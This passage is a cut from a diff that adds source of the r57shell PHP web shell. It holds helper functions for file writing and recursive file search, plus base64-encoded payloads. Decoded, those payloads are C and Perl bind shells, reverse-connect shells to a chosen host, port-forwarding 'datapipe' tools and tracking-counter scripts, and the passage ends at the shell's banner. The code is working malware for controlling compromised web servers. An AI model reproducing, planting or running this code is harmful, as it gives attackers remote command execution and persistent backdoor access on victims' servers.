'-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." "; } + $ret .= "value=\"".$value."\">"; + return $ret; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or we($fname); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 +JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW +FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv +dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl +hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz +tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV +ybmV0LS0+"; +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; +@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}} +echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp; +<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> +</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>'; +echo ws(2); +echo "<b>".date 